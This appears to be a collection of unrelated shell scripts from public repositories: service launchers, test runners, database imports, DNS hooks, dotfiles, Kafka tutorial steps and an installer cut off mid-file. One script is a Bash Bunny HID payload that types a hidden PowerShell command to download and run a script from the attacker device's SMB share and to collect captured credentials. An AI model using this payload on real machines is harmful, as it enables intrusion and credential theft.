permissive
|
#!/bin/bash
# trap ctrl-c and call ctrl_c()
trap ctrl_c INT
function ctrl_c() {
popd > /dev/null
exit
}
if [[ -z "${POSHC2_DIR}" ]]; then
POSH_DIR="/opt/PoshC2"
else
POSH_DIR=${POSHC2_DIR}
fi
pushd $POSH_DIR >/dev/null
if [ "$?" -eq "0" ]; then
systemctl enable poshc2.service >/dev/null
systemctl restart poshc2.service >/dev/null
while [[ $x -le 10 ]]; do
if [ -f "/var/log/poshc2_server.log" ]; then
break;
fi
sleep 1s
x=$(( $x + 1 ))
done
/usr/bin/posh-log
popd > /dev/null
fi
| true |
f82bb92f0697933cbcf9bc565ecb4822f919291b
|
Shell
|
oleklapp/mcash-magento
|
/test.sh
|
UTF-8
| 261 | 2.828125 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/sh
set -e
set -o xtrace # Echo out the command before running it
find . -name "*.php" -not -path "./vendor/*"| xargs -n 1 php -l
set +e
set -e
php --version
for f in `find . -name "*test.php" -not -path "./vendor/*"`
do
phpunit --verbose $f
done
| true |
252dd685a8648bb43b56b28b414f91d4dcdca9c2
|
Shell
|
jkjuopperi/nist-hash-check
|
/make-psql-db.sh
|
UTF-8
| 1,779 | 2.96875 | 3 |
[] |
no_license
|
#!/bin/sh
generate () {
cat <<-EOF
BEGIN;
CREATE TABLE IF NOT EXISTS mfg (MfgCode integer PRIMARY KEY NOT NULL, MfgName text NOT NULL);
CREATE TABLE IF NOT EXISTS os (
OpSystemCode integer PRIMARY KEY NOT NULL,
OpSystemName text NOT NULL,
OpSystemVersion text,
MfgCode integer REFERENCES mfg (MfgCode)
);
CREATE TABLE IF NOT EXISTS prod (
ProductCode integer NOT NULL,
ProductName text NOT NULL,
ProductVersion text,
OpSystemCode integer REFERENCES os (OpSystemCode),
MfgCode integer REFERENCES mfg (MfgCode),
Language text,
ApplicationType text
);
CREATE TABLE IF NOT EXISTS file (
"SHA-1" text,
"MD5" text,
"CRC32" text,
FileName text NOT NULL,
FileSize bigint,
ProductCode integer,
OpSystemCode integer REFERENCES os (OpSystemCode),
SpecialCode text
);
EOF
cat <<-EOF
COPY mfg FROM STDIN ( FORMAT CSV, HEADER true, ENCODING 'UTF-8', DELIMITER ',', QUOTE '"', ESCAPE '\' );
EOF
iconv -f UTF-8 -t UTF-8 --byte-subst="<0x%x>" --unicode-subst="<U+%04X>" nsrlmfg.txt
echo '\.'
cat <<-EOF
COPY os FROM STDIN ( FORMAT CSV, HEADER true, ENCODING 'UTF-8', DELIMITER ',', QUOTE '"', ESCAPE '\' );
EOF
iconv -f UTF-8 -t UTF-8 --byte-subst="<0x%x>" --unicode-subst="<U+%04X>" nsrlos.txt
echo '\.'
cat <<-EOF
COPY prod FROM STDIN ( FORMAT CSV, HEADER true, ENCODING 'UTF-8', DELIMITER ',', QUOTE '"', ESCAPE '\' );
EOF
iconv -f UTF-8 -t UTF-8 --byte-subst="<0x%x>" --unicode-subst="<U+%04X>" nsrlprod.txt
echo '\.'
cat <<-EOF
COPY file FROM STDIN ( FORMAT CSV, HEADER true, ENCODING 'UTF-8', DELIMITER ',', QUOTE '"' );
EOF
iconv -f UTF-8 -t UTF-8 --byte-subst="<0x%x>" --unicode-subst="<U+%04X>" nsrlfile.txt
echo '\.'
cat <<-EOF
CREATE INDEX file_sha1_idx ON file ("SHA-1");
COMMIT;
EOF
}
generate | psql $@
| true |
6bae44a869ee2534a127027d5f48a36725106553
|
Shell
|
Michael-Santos/rip
|
/configura.sh
|
UTF-8
| 665 | 3.328125 | 3 |
[] |
no_license
|
# Cria as interfaces necessárias
if [ $# -ne '1' ]; then
echo "Uso: \$configura < interface >"
exit
fi
# Endereco de cada uma das interfaces
ENDERECOS[0]='192.168.1.100'
ENDERECOS[1]='192.168.2.100'
ENDERECOS[2]='192.168.3.100'
ENDERECOS[3]='192.168.1.200'
ENDERECOS[4]='192.168.5.100'
ENDERECOS[5]='192.168.3.200'
ENDERECOS[6]='192.168.4.100'
ENDERECOS[7]='192.168.5.200'
ENDERECOS[8]='192.168.2.200'
ENDERECOS[9]='192.168.4.200'
# Modo automático de obter interfaces (nem sempre funciona)
# INTERFACES=$(ip link show | cut -d " " -f 2 | cut -d ":" -f 1 | cut -d$'\n' -f 3 )
for i in 0 1 2 3 4 5 6 7 8 9;
do
sudo ifconfig $1:$i ${ENDERECOS[$i]}
done;
| true |
e8b8191276920c79de2fe39c1d9c76f976083701
|
Shell
|
oke11o/gqlgen-sqlc-example
|
/scripts/pg_healthcheck.sh
|
UTF-8
| 183 | 2.90625 | 3 |
[] |
no_license
|
#!/bin/sh
if select=$(echo 'SELECT 1' | psql --username ${POSTGRES_USER} --dbname ${POSTGRES_DB} --quiet --no-align --tuples-only ) && [ ${select} = '1' ];
then
exit 0;
fi;
exit 1
| true |
3e159568b4312cbbbb36ebc80e3d05acd0bba680
|
Shell
|
waxcage/7-hour-quest
|
/no.sh
|
UTF-8
| 74 | 2.515625 | 3 |
[] |
no_license
|
#!/bin/bash
COUNTER=0
while [ $COUNTER -lt 10 ]; do
echo "n"
done
| true |
037dd6854910a6fa2e090e2c036f47f2b84fffcc
|
Shell
|
krishnachaitanyareddy/director-scripts
|
/azure-dns-scripts/bootstrap_dns_nm.sh
|
UTF-8
| 1,573 | 3.890625 | 4 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
# RHEL 7.2 uses NetworkManager. Add a script to be automatically invoked when interface comes up.
cat > /etc/NetworkManager/dispatcher.d/12-register-dns <<"EOF"
#!/bin/bash
# NetworkManager Dispatch script
# Deployed by Cloudera Director Bootstrap
#
# Expected arguments:
# $1 - interface
# $2 - action
#
# See for info: http://linux.die.net/man/8/networkmanager
# Register A and PTR records when interface comes up
# only execute on the primary nic
if [ "$1" != "eth0" || "$2" != "up" ]
then
exit 0;
fi
# when we have a new IP, perform nsupdate
new_ip_address="$DHCP4_IP_ADDRESS"
host=$(hostname -s)
domain=$(hostname | cut -d'.' -f2- -s)
domain=${domain:='cdh-cluster.internal'} # REPLACE-ME If no hostname is provided, use cdh-cluster.internal
IFS='.' read -ra ipparts <<< "$new_ip_address"
ptrrec="$(printf %s "$new_ip_address." | tac -s.)in-addr.arpa"
nsupdatecmds=$(mktemp -t nsupdate.XXXXXXXXXX)
resolvconfupdate=$(mktemp -t resolvconfupdate.XXXXXXXXXX)
echo updating resolv.conf
grep -iv "search" /etc/resolv.conf > "$resolvconfupdate"
echo "search $domain" >> "$resolvconfupdate"
cat "$resolvconfupdate" > /etc/resolv.conf
echo "Attempting to register $host.$domain and $ptrrec"
{
echo "update delete $host.$domain a"
echo "update add $host.$domain 600 a $new_ip_address"
echo "send"
echo "update delete $ptrrec ptr"
echo "update add $ptrrec 600 ptr $host.$domain"
echo "send"
} > "$nsupdatecmds"
nsupdate "$nsupdatecmds"
exit 0;
EOF
chmod 755 /etc/NetworkManager/dispatcher.d/12-register-dns
service network restart
| true |
7f1e6bd32c3eea260f8495fdcb13271c9d9320b4
|
Shell
|
alvls/parprog-2018-1
|
/groups/1506-3/lipatov_id/run.sh
|
UTF-8
| 325 | 2.84375 | 3 |
[] |
no_license
|
#!/bin/bash
for file in ./Tests/*; do
if [[ "$file" != *perfect.ans ]] &&
[[ "$file" != *.seq ]] &&
[[ "$file" != *.omp ]] &&
[[ "$file" != *.tbb ]];
then
./Test/b 4 $file $file".seq" $file".omp" $file".tbb"
diff $file".seq" $file".omp"
diff $file".seq" $file".tbb"
fi
done
| true |
724aad9d084fbb113ec5ba7d85e1150f36bcd795
|
Shell
|
hqjang-pepper/Linux-study
|
/test_integer.sh
|
UTF-8
| 255 | 3.328125 | 3 |
[] |
no_license
|
#!/bin/bash
#test_integer: evaluate the value of integer
INT=-5
if [[ "$INT" =~ ^-?[0-9]+$ ]]; then #n자리 숫자 매치 여부. -는 시작할때 올수도 있고 안올수도 있다.
echo "it is integer."
else
"INT is not an integer." >&2
fi
| true |
56ffb0ddb7af529988eed710a2457e1844a416c3
|
Shell
|
Boffmann/ETCSOnBoard
|
/setup_revPi.sh
|
UTF-8
| 1,308 | 2.859375 | 3 |
[] |
no_license
|
sudo su
apt update
echo "Installing OpenSplice dependencies..."
sleep 3
apt install -y flex bison perl gawk cmake vim
echo "Downloading OpenSplice Source code..."
sleep 3
wget https://github.com/ADLINK-IST/opensplice/archive/OSPL_V6_9_190925OSS_RELEASE.zip
echo "Unzipping OpenSplice Sourcecode..."
sleep 3
unzip OSPL_V6_9_190925OSS_RELEASE.zip -d ospl
echo "Compiling OpenSplice..."
sleep 3
cd ospl/OSPL_V6_9_190925OSS_RELEASE
source ./configure & make
echo "Installing OpenSplice..."
make install
source /home/ospl/OSPL_V6_9_190925OSS_RELEASE/install/HDE/armv7l.linux-dev/release.com
echo "source /home/ospl/OSPL_V6_9_190925OSS_RELEASE/install/HDE/armv7l.linux-dev/release.com" >> /home/pi/.bashrc
ip_addr=$(ip addr show eth0 | awk '$1 == "inet" {gsub(/\/.*$/, "", $2); print $2}')
sed "s/<NetworkInterfaceAddress>.*<\/NetworkInterfaceAddress>/<NetworkInterfaceAddress>$ip_addr<\/NetworkInterfaceAddress>/" $OSPL_HOME/etc/config/ospl.xml
sed -i '$ d' /etc/rc.local
echo "ip_addr=\$(ip addr show eth0 | awk '\$1 == \"inet\" {gsub(/\/.*$/, \"\", \$2); print \$2}')" >> /etc/rc.local
echo "sed \"s/<NetworkInterfaceAddress>.*<\\/NetworkInterfaceAddress>/<NetworkInterfaceAddress>\$ip_addr<\\/NetworkInterfaceAddress>/\" \$OSPL_HOME/etc/config/ospl.xml" >> /etc/rc.local
echo "exit 0" >> /etc/rc.local
| true |
600e8537b19edc7ee10903f1d602369a5770bdcd
|
Shell
|
SergiOn/java
|
/Courses/Apache-Kafka-Series-Kafka-Connect-Hands-on-Learning/kafka-connect-code_v3.3.0/kafka-connect-tutorial-sources.sh
|
UTF-8
| 3,516 | 3.125 | 3 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Make sure you change the ADV_HOST variable in docker-compose.yml
# if you are using docker Toolbox
# 1) Source connectors
# Start our kafka cluster
docker-compose up kafka-cluster
# Wait 2 minutes for the kafka cluster to be started
###############
# A) FileStreamSourceConnector in standalone mode
# Look at the source/demo-1/worker.properties file and edit bootstrap
# Look at the source/demo-1/file-stream-demo.properties file
# Look at the demo-file.txt file
# We start a hosted tools, mapped on our code
# Linux / Mac
docker run --rm -it -v "$(pwd)":/tutorial --net=host landoop/fast-data-dev:cp3.3.0 bash
# Windows Command Line:
docker run --rm -it -v %cd%:/tutorial --net=host landoop/fast-data-dev:cp3.3.0 bash
# Windows Powershell:
docker run --rm -it -v ${PWD}:/tutorial --net=host landoop/fast-data-dev:cp3.3.0 bash
# we launch the kafka connector in standalone mode:
cd /tutorial/source/demo-1
# create the topic we write to with 3 partitions
kafka-topics --create --topic demo-1-standalone --partitions 3 --replication-factor 1 --zookeeper 127.0.0.1:2181
# Usage is connect-standalone worker.properties connector1.properties [connector2.properties connector3.properties]
connect-standalone worker.properties file-stream-demo-standalone.properties
# write some data to the demo-file.txt !
# shut down the terminal when you're done.
###############
###############
# B) FileStreamSourceConnector in distributed mode:
# create the topic we're going to write to
docker run --rm -it --net=host landoop/fast-data-dev:cp3.3.0 bash
kafka-topics --create --topic demo-2-distributed --partitions 3 --replication-factor 1 --zookeeper 127.0.0.1:2181
# you can now close the new shell
# head over to 127.0.0.1:3030 -> Connect UI
# Create a new connector -> File Source
# Paste the configuration at source/demo-2/file-stream-demo-distributed.properties
# Now that the configuration is launched, we need to create the file demo-file.txt
docker ps
docker exec -it <containerId> bash
touch demo-file.txt
echo "hi" >> demo-file.txt
echo "hello" >> demo-file.txt
echo "from the other side" >> demo-file.txt
# Read the topic data
docker run --rm -it --net=host landoop/fast-data-dev:cp3.3.0 bash
kafka-console-consumer --topic demo-2-distributed --from-beginning --bootstrap-server 127.0.0.1:9092
# observe we now have json as an output, even though the input was text!
###############
###############
# C) TwitterSourceConnector in distributed mode:
# create the topic we're going to write to
docker run --rm -it --net=host landoop/fast-data-dev:cp3.3.0 bash
kafka-topics --create --topic demo-3-twitter --partitions 3 --replication-factor 1 --zookeeper 127.0.0.1:2181
# Start a console consumer on that topic
kafka-console-consumer --topic demo-3-twitter --bootstrap-server 127.0.0.1:9092
# Follow the instructions at: https://github.com/Eneco/kafka-connect-twitter#creating-a-twitter-application
# To obtain the required keys, visit https://apps.twitter.com/ and Create a New App. Fill in an application name & description & web site and accept the developer aggreement. Click on Create my access token and populate a file twitter-source.properties with consumer key & secret and the access token & token secret using the example file to begin with.
# Setup instructions for the connector are at: https://github.com/Eneco/kafka-connect-twitter#setup
# fill in the required information at demo-3/source-twitter-distributed.properties
# Launch the connector and start seeing the data flowing in!
| true |
e2874d52bdfeb1d608921dfbad9acdc3bfe3cb11
|
Shell
|
ssdemajia/CCC
|
/shell/simple_vm.sh
|
UTF-8
| 703 | 3.984375 | 4 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# 这个程序用于初始哈chroot中程序所需要的动态库
# 联系方式:2chashao@gmail.com
# History:
# 2019.10.19 chashao first release
function run() {
pwd=`pwd`;
sudo chroot ${pwd} ${1};
}
# 参数传入判断
[ "$#" -ne 1 ] && echo "脚本必须有一个参数file,指定运行的文件" && exit 0;
# 需要的库
ldd=$(for i in `ldd ./a.out`;do echo $i;done | grep -v = | grep -v '(' | grep / )
# 已经存在库,那么直接退出
if [ -d lib ]; then
echo "such directory has exist"
exit 1;
fi
for i in ${ldd}
do
# ${i%/*}删除从右其第一个匹配的
currentdir=${i:1}
mkdir -p ${currentdir%/*}
cp ${i} ${currentdir}
done
run $@;
exit $?;
| true |
076e702ec1f5072f862d1c050193f564ab3821f4
|
Shell
|
YenForYang/debian-discount
|
/discount/librarian.sh
|
UTF-8
| 1,015 | 3.046875 | 3 |
[
"BSD-3-Clause"
] |
permissive
|
#! /bin/sh
#
# Build ELF shared libraries, hiding (some) ickiness from the makefile
ACTION=$1; shift
LIBRARY=$1; shift
eval `awk -F. '{ printf "MAJOR=%d\n", $1;
printf "VERSION=%d.%d.%d\n", $1, $2, $3; }' $1`
shift
LIBNAME=$LIBRARY.so
FULLNAME=$LIBNAME.$VERSION
case "$ACTION" in
make) FLAGS="-g -O2 -fdebug-prefix-map=/dev/shm/systemd/test/deps/test/lvm2/tmp/corosync/tmp/libqb/libsubunit-dev/others/libmarkdown2/discount=. -Wformat -march=native -pipe -fstack-security-check -Wformat-security -fPIC -shared"
unset VFLAGS
test "T" && VFLAGS="-Wl,-soname,$LIBNAME.$MAJOR"
rm -f $LIBRARY $LIBNAME $LIBNAME.$MAJOR
if ccache icc $FLAGS $VFLAGS -o $FULLNAME "$@"; then
/bin/ln -s $FULLNAME $LIBRARY
/bin/ln -s $FULLNAME $LIBNAME
/bin/ln -s $FULLNAME $LIBNAME.$MAJOR
fi
;;
files) echo "$FULLNAME" "$LIBNAME" "$LIBNAME.$MAJOR"
;;
install)/usr/bin/install -c $FULLNAME "$1"
/bin/ln -s -f $FULLNAME $1/$LIBNAME.$MAJOR
/bin/ln -s -f $FULLNAME $1/$LIBNAME
/sbin/ldconfig "$1"
;;
esac
| true |
8a9bbecdff75c0b2f803e1567d8069e895b79736
|
Shell
|
SamPedley/dotfiles
|
/.aliases
|
UTF-8
| 2,939 | 3.296875 | 3 |
[] |
no_license
|
#!/usr/bin/env bash
# Easier navigation: .., ..., ...., ....., ~ and -
alias ..="cd .."
alias ...="cd ../.."
alias ....="cd ../../.."
alias .....="cd ../../../.."
alias ~="cd ~" # `cd` is probably faster to type though
alias -- -="cd -"
alias cdp="cd ~/Projects"
alias cdgo="cd $GOPATH"
# GR shortcuts
alias cdts="cd ~/Projects/TransferSafe/"
# Shortcuts
alias e="emacs"
alias v="vim"
alias g="git"
alias nr="npm run"
alias gb="go build"
# kubectl
alias ku="kubectl"
alias kug="kubectrl get"
alias kucontext="kubectl config current-context"
# docker
alias doc="docker"
alias hosts="sudo vim /etc/hosts"
# Detect which `ls` flavor is in use
if ls --color > /dev/null 2>&1; then # GNU `ls`
colorflag="--color"
export LS_COLORS='no=00:fi=00:di=01;31:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.avi=01;35:*.fli=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.ogg=01;35:*.mp3=01;35:*.wav=01;35:'
else # macOS `ls`
colorflag="-G"
export LSCOLORS='BxBxhxDxfxhxhxhxhxcxcx'
fi
# List all files colorized in long format
alias l="ls -lF ${colorflag}"
# List all files colorized in long format, including dot files
alias la="ls -laF ${colorflag}"
# List only directories
alias lsd="ls -lF ${colorflag} | grep --color=never '^d'"
# Always use color output for `ls`
alias ls="command ls ${colorflag}"
# Always enable colored `grep` output
# Note: `GREP_OPTIONS="--color=auto"` is deprecated, hence the alias usage.
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
# Enable aliases to be sudo’ed
alias sudo='sudo '
# IP addresses
alias ip="dig +short myip.opendns.com @resolver1.opendns.com"
alias localip="ipconfig getifaddr en0"
# Trim new lines and copy to clipboard
alias c="tr -d '\n' | pbcopy"
# Show/hide hidden files in Finder
alias show="defaults write com.apple.finder AppleShowAllFiles -bool true && killall Finder"
alias hide="defaults write com.apple.finder AppleShowAllFiles -bool false && killall Finder"
# URL-encode strings
alias urlencode='python -c "import sys, urllib as ul; print ul.quote_plus(sys.argv[1]);"'
# Intuitive map function
# For example, to list all directories that contain a certain file:
# find . -name .gitattributes | map dirname
alias map="xargs -n1"
# Lock the screen (when going AFK)
alias afk="/System/Library/CoreServices/Menu\ Extras/User.menu/Contents/Resources/CGSession -suspend"
# Reload the shell (i.e. invoke as a login shell)
alias reload="exec ${SHELL} -l"
# Print each PATH entry on a separate line
alias path='echo -e ${PATH//:/\\n}'
| true |
9a271b70dfe55c209e144191a8acc25101066531
|
Shell
|
reotyan/dot_files
|
/.shadow/ubuntu/prompt.sh
|
UTF-8
| 1,319 | 3.3125 | 3 |
[] |
no_license
|
#!/bin/sh
trap 'printf "\e[0m"' DEBUG
export TZ=Tokyo
pc=$?
wd=$(pwd | wc -m) # Working Directory
pd=$(pwd | wc -m) # Past Directory
PROMPT_COMMAND='pc=$?; wd=$(pwd | wc -m); printf "\e[s\e[1;$(expr $COLUMNS - ${pd} + 1)f$(for n in $(seq 1 ${pd});do printf " ";done)\e[${wd}D\e[1m$(pwd)\e[0m\n\e[$(expr $COLUMNS - 11)C$(LANG=en_US.UTF-8 date +"%a %b %d")\n\e[$(expr $COLUMNS - 6)C$(TZ="Asia/Tokyo" date +"%H:%M")\e[u"; pd=$(pwd | wc -m)'
PS1='\[\e[0m\]$pc $SHLVL $(if [ $pc -eq 0 ]; then echo "\[\e[0;32m\];)"; else echo "\[\e[0;31m\]:("; fi) \[\e[38;5;248m\]\W \[\e[0;34m\]\$ \[\e[38;5;248m\]'
colors() {
local fgc bgc vals seq0
printf "Color escapes are %s\n" '\e[${value};...;${value}m'
printf "Values 30..37 are \e[33mforeground colors\e[m\n"
printf "Values 40..47 are \e[43mbackground colors\e[m\n"
printf "Value 1 gives a \e[1mbold-faced look\e[m\n\n"
# foreground colors
for fgc in {30..37}; do
# background colors
for bgc in {40..47}; do
fgc=${fgc#37} # white
bgc=${bgc#40} # black
vals="${fgc:+$fgc;}${bgc}"
vals=${vals%%;}
seq0="${vals:+\e[${vals}m}"
printf " %-9s" "${seq0:-(default)}"
printf " ${seq0}TEXT\e[m"
printf " \e[${vals:+${vals+$vals;}}1mBOLD\e[m"
done
echo; echo
done
}
colors256() {
~/Programs/256colors
}
| true |
2a76ca1471b8e675a2d773124e7081fba5cc9f29
|
Shell
|
lihentian/nerv
|
/resources/scripts/nerv/cluster/Host/create.sh
|
UTF-8
| 158 | 3.171875 | 3 |
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
function create() {
if [ ! -d $root ]; then
mkdir -p $root
fi
}
if [ "$root" == "" ]; then
$root=nerv
fi
create
| true |
87032317b5be12bf90298220ad0672045d5521ee
|
Shell
|
hak5/bashbunny-payloads
|
/payloads/library/execution/psh_DownloadExecSMB/payload.txt
|
UTF-8
| 2,495 | 3.765625 | 4 |
[] |
no_license
|
#!/bin/bash
#
# Title: Powershell Download and Execute SMB
# Author: LowValueTarget
# Version: 2.0
# Category: Powershell
# Target: Windows XP SP3+ (Powershell)
# Attackmodes: HID, RNDIS_ETHERNET
# Firmware: >= 1.2
#
# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Possibilities are limitless!
# Credentials captured by are stored as loot.
# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures)
#
# Required tools: impacket
=======
# Credentials captured by are stored as loot.
# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures)
#
# Required tools: impacket
#
# | Attack Stage | Description |
# | ------------------- | ------------------------------|
# | Stage 1 | Powershell |
# | Stage 2 | Delivering powershell payload |
#
ATTACKMODE RNDIS_ETHERNET HID
# SETUP
LED SETUP
REQUIRETOOL impacket # required for SMB server
GET SWITCH_POSITION
GET TARGET_HOSTNAME
GET HOST_IP
# DEFINE DIRECTORIES
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
LOOTDIR_BB=/root/udisk/loot/psh_DownloadExecSMB
mkdir -p /tmp/{l,p}
# CHECK FOR POWERSHELL
if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
LED FAIL
exit 1
fi
cp -R ${PAYLOAD_DIR}/* /tmp/p/ # any additional assets will be available in tmp
# GET HOSTNAME
HOST=${TARGET_HOSTNAME}
[[ -z "${HOST}" ]] && HOST="noname"
COUNT=$(ls -lad ${LOOTDIR_BB}/${HOST}* | wc -l)
COUNT=$((COUNT+1))
mkdir -p ${LOOTDIR_BB}/${HOST}-${COUNT}
LOOTDIR_BB=${LOOTDIR_BB}/${HOST}-${COUNT}
# START SMB SERVER
LOGFILE=/tmp/l/psh_downloadsmb.log
touch ${LOGFILE}
python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp > ${LOGFILE} &
# STAGE 1 - POWERSHELL
LED STAGE1
RUN WIN "powershell -WindowStyle Hidden \"while (\$true) {If ((New-Object net.sockets.tcpclient(${HOST_IP},445)).Connected) {iex (New-Object Net.WebClient).DownloadString('\\\\${HOST_IP}\\s\\p\\p.txt');New-Item \\\\${HOST_IP}\\s\\COMPLETE -ItemType file;exit}}\""
# TIP: To exfil any data, upload to \\172.16.64.1\s\l\ -- this will be copied to the BB as loot
# TIP: Remove tracks in the psh payload if you wish
# STAGE 2 - HURRY UP AND WAIT
LED STAGE2
while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done
# CLEANUP
LED CLEANUP
# STASH THE LOOT
mv /tmp/l/* ${LOOTDIR_BB}/
rm -rf /tmp/{l,p}
# Sync file system
sync
LED FINISH
| true |
b97b1762f981a60071418f7592364825570e1bc3
|
Shell
|
ankitshah009/AudioCaption
|
/scripts/prepare_bertserver.sh
|
UTF-8
| 1,343 | 3.640625 | 4 |
[
"MIT"
] |
permissive
|
#!/bin/bash
#SBATCH --job-name bert-server
#SBATCH --partition=gpu
#SBATCH --cpus-per-task=2
#SBATCH --gres=gpu:1
#SBATCH --output=logs/bert-server-%j.log
#SBATCH --error=logs/bert-server-%j.err
if [ $# -lt 1 ]; then
cat >&2 <<EOF
Usage: $0 <bert-server-dir> <lang> [<num-worker>]
e.g.: $0 utils/bert zh 4
EOF
exit 1;
fi
node=$(hostname -s)
module load cuda/10.0
source activate bertserver
bertserver=$1
num_worker=3
lang=$2
if [ $# -eq 3 ]; then
num_worker=$3
fi
[ ! -d $bertserver ] && mkdir $bertserver
cd $bertserver
if [ $lang == "zh" ]; then
model_dir="chinese_L-12_H-768_A-12"
if [ ! -d chinese_L-12_H-768_A-12 ]; then
[ ! -f chinese_L-12_H-768_A-12.zip ] && wget https://storage.googleapis.com/bert_models/2018_11_03/chinese_L-12_H-768_A-12.zip
unzip chinese_L-12_H-768_A-12.zip
fi
else
model_dir="uncased_L-12_H-768_A-12"
if [ ! -d uncased_L-12_H-768_A-12 ]; then
mkdir uncased_L-12_H-768_A-12
[ ! -f uncased_L-12_H-768_A-12.zip ] && wget https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-12_H-768_A-12.zip
unzip uncased_L-12_H-768_A-12.zip -d uncased_L-12_H-768_A-12
fi
fi
# print which machine the server is running on
echo -e "
Bert server is running on ${node}
"
bert-serving-start -model_dir ${model_dir} -num_worker ${num_worker}
| true |
b1ba85f9816a3017b65b5d49a83a61442d22a501
|
Shell
|
aroig/dotfiles
|
/shell/system/shellrc.d/completion.sh
|
UTF-8
| 1,649 | 3.203125 | 3 |
[] |
no_license
|
#!/bin/zsh
#------------------------------------------------------------------#
# File: completion.zsh Completion adjustments #
# Version: #
# Author: Abdó Roig-Maranges <abdo.roig@gmail.com> #
#------------------------------------------------------------------#
if [ "$ZSH_VERSION" ]; then
# add completions to fpath
fpath=($HOME/.zsh/completions $fpath)
# enable completion
zmodload zsh/complist
autoload -U compinit
compinit -u
# settings
setopt bash_auto_list # Bring list on second tab.
setopt glob_complete # Autocomplete with glob
# colorize stuff
zstyle ':completion:*:default' list-colors ${(s.:.)LS_COLORS} # colorize file lists
zstyle ':completion:*:*:systemctl*' list-colors ${SYSTEMD_COLORS} # colorize systemd units
zstyle ':completion:*' matcher-list 'm:{a-zA-Z}={A-Za-z}' # case insensitive
zstyle ':completion:*:descriptions' format '%U%B%d%b%u' # heading format
zstyle ':completion:*' menu select=4 # menu selection when >= 4 options
#--------------------------#
# Function completions #
#--------------------------#
# copy a completions from oldcmd to newcmd
# compdef newcmd=oldcmd
compdef mk=make
# compdef jctl=journalctl
# zstyle ':completion::*:expand:*' tag-order all-expansions
fi
if [ "$BASH_VERSION" ]; then
if [ -r /usr/share/bash-completion/bash_completion ]; then
source /usr/share/bash-completion/bash_completion
fi
fi
| true |
1c0a45c51d8b0b6d9b2fc9b7ea1180493e65d5a7
|
Shell
|
jewmich/wordpress
|
/docker/docker-entrypoint.sh
|
UTF-8
| 1,733 | 3.890625 | 4 |
[] |
no_license
|
#!/bin/bash
set -euo pipefail
# Custom entrypoint that only handles installing Wordpress. We don't need any of the environment
# setting stuff (we have our own version of wp-config.php that stores secrets outside Git) or the DB
# creation logic (which the Docker MySQL image handles for us).
if ! [ -e index.php -a -e wp-includes/version.php ]; then
echo >&2 "WordPress not found in $(pwd) - copying now..."
if [ "$(ls -A)" ]; then
echo >&2 "WARNING: $(pwd) is not empty - press Ctrl+C now if this is an error!"
( set -x; ls -A; sleep 10 )
fi
tar cf - --one-file-system -C /usr/src/wordpress . | tar xf -
echo >&2 "Complete! WordPress has been successfully copied to $(pwd)"
if [ ! -e .htaccess ]; then
# NOTE: The "Indexes" option is disabled in the php:apache base image
cat > .htaccess <<-'EOF'
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
EOF
chown www-data:www-data .htaccess
fi
fi
cd ..
if ! [ -e composer.phar ]; then
# Install composer (taken from https://getcomposer.org/doc/faqs/how-to-install-composer-programmatically.md)
EXPECTED_SIGNATURE=$(curl -s https://composer.github.io/installer.sig)
php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');"
ACTUAL_SIGNATURE=$(php -r "echo hash_file('SHA384', 'composer-setup.php');")
if [ "$EXPECTED_SIGNATURE" != "$ACTUAL_SIGNATURE" ]
then
>&2 echo 'ERROR: Invalid installer signature'
exit 1
fi
php composer-setup.php --quiet
rm composer-setup.php
fi
php composer.phar install
cd -
exec "$@"
| true |
ecb62c50bc20aeaff898923572709b0815ddcd8f
|
Shell
|
pdixon/dotfiles
|
/bin/backup-etc
|
UTF-8
| 135 | 2.734375 | 3 |
[] |
no_license
|
#! /bin/bash
TARFILE=~/$(hostname -s)-etc-$(date "+%Y-%m-%d").tar.gz
cd /
tar -v --create --gzip --one-file-system -f ${TARFILE} etc
| true |
a7f9ad02695b2d83fd4563dd732e8079db6cc425
|
Shell
|
EducopiaInstitute/etdplus-installscripts
|
/install_solr.sh
|
UTF-8
| 2,134 | 3.78125 | 4 |
[] |
no_license
|
#!/bin/bash
# Install Solr and set up Solr core
# Note that this must be done after installing the Sufia application because it
# uses configuration files from the "solr_conf" directory in setting up the core.
set -o errexit -o nounset -o xtrace -o pipefail
# Read settings and environmental overrides
# $1 = platform (aws or vagrant); $2 = path to install scripts
[ -f "${2}/config.sh" ] && . "${2}/config.sh"
[ -f "${2}/config_${1}.sh" ] && . "${2}/config_${1}.sh"
cd "$INSTALL_DIR"
# Install Java 8 and make it the default Java
add-apt-repository -y ppa:webupd8team/java
apt-get update -y
echo oracle-java8-installer shared/accepted-oracle-license-v1-1 select true | /usr/bin/debconf-set-selections
apt-get install -y oracle-java8-installer
update-java-alternatives -s java-8-oracle
# Install Solr
